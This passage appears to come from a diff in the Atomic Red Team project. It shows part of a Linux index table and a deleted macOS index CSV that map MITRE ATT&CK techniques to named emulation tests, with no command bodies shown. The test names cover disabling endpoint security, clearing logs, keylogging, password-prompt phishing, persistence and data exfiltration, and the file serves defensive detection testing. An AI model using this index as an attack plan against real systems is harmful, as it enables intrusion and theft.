312 execution T1059.004 Command and Scripting Interpreter: Bash 8 Command line scripts b04ed73c-7d43-4dc8-b563-a2fc595cba1a sh
313 execution T1059.004 Command and Scripting Interpreter: Bash 9 Obfuscated command line scripts 5bec4cc8-f41e-437b-b417-33ff60acf9af sh
314 execution T1059.004 Command and Scripting Interpreter: Bash 10 Change login shell c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 bash
315 execution T1059.004 Command and Scripting Interpreter: Bash 11 Environment variable scripts bdaebd56-368b-4970-a523-f905ff4a8a51 bash
316 execution T1059.004 Command and Scripting Interpreter: Bash 12 Detecting pipe-to-shell fca246a8-a585-4f28-a2df-6495973976a1 bash
317 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
318 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
319 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
320 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 bash
321 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
322 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
323 initial-access T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
324 initial-access T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
325 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
326 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
327 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
328 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
329 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
330 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
331 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 8 Python3 http.server 3ea1f938-f80a-4305-9aa8-431bc4867313 sh
atomics/Indexes/Indexes-CSV/macos-index.csv
-249
View File
@@ -1,249 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,4,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,5,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,6,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,7,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,8,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,9,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,10,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,11,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,12,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,3,Copy and Delete Mailbox Data on macOS,3824130e-a6e4-4528-8091-3a52eeb540f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,6,Copy and Modify Mailbox Data on macOS,8a0b1579-5a36-483a-9cde-0236983e1665,bash
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
